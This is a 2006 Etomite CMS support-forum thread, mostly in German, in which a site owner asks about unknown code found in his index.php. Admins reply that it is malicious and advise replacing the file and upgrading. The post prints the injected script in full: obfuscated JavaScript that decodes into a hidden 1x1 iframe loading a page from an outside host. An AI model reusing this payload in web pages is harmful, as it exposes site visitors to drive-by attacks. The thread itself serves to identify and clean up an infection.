Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

1

etomite mit Sicherheitsloch?

Started by stp69, Aug 04 2006 11:45 AM

You cannot reply to this topic

4 replies to this topic

#1 stp69

Etomite Forum Newbie

Member
41 posts

Posted 04 August 2006 - 11:45 AM

Hallo zusammen,

ich benutze etomite in der Version Etomite 0.6 (Heliades) steht so im Admintool.

Seit einiger Zeit erhalte ich immer wieder Infos, in dem User von einem Virusangriff meine Seite berichten. Darauf hin habe ich die vorhandenen Dateien mit den original Dateien verglichen und in der index.php folgenden Code gefunden:

<script LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
<script LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

Der nicht zum Paket gehÃ¶rt. Kann mir jemand sagen was das ist oder ob das bekannt ist?

Danke
Stephan

Back to top

#2 Jelmer

Loves Etomite Forums!

Member
1,173 posts

Posted 06 August 2006 - 07:41 PM

Rough translation:

User found the mentioned code in his index.php. Can someone indicate if it's a known piece and/or is it a virus?

Edited by Jelmer, 06 August 2006 - 09:58 PM.

Back to top

#3 Ralph

Loves Etomite Forums!

Admin
6,524 posts

Gender:Male

Posted 06 August 2006 - 09:49 PM

The code in question should not be there and should therefore be considered malicious... I will attempt to decypher the code to find its intended purpose... stp69 should download and install the newest index.php from here in the forums and replace the infected copy immediately... :eto:

Back to top

#4 Dean

Loves Etomite Forums!

Admin
4,758 posts

Gender:Male

Posted 06 August 2006 - 10:00 PM

They should upgrade to 0.6.1 Immediately too - then get the host to check their server for other malicious scripts.

Back to top

#5 Jelmer

Loves Etomite Forums!

Member
1,173 posts

Posted 06 August 2006 - 10:09 PM

Sie sollten GLEICH Etomite 0.6.1 FINAL (Prelude) installieren, die extra code checken und ihre Host kontaktieren um zu sehen ob es noch andere unbekannte Code gibt...

Back to top

Back to German

1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users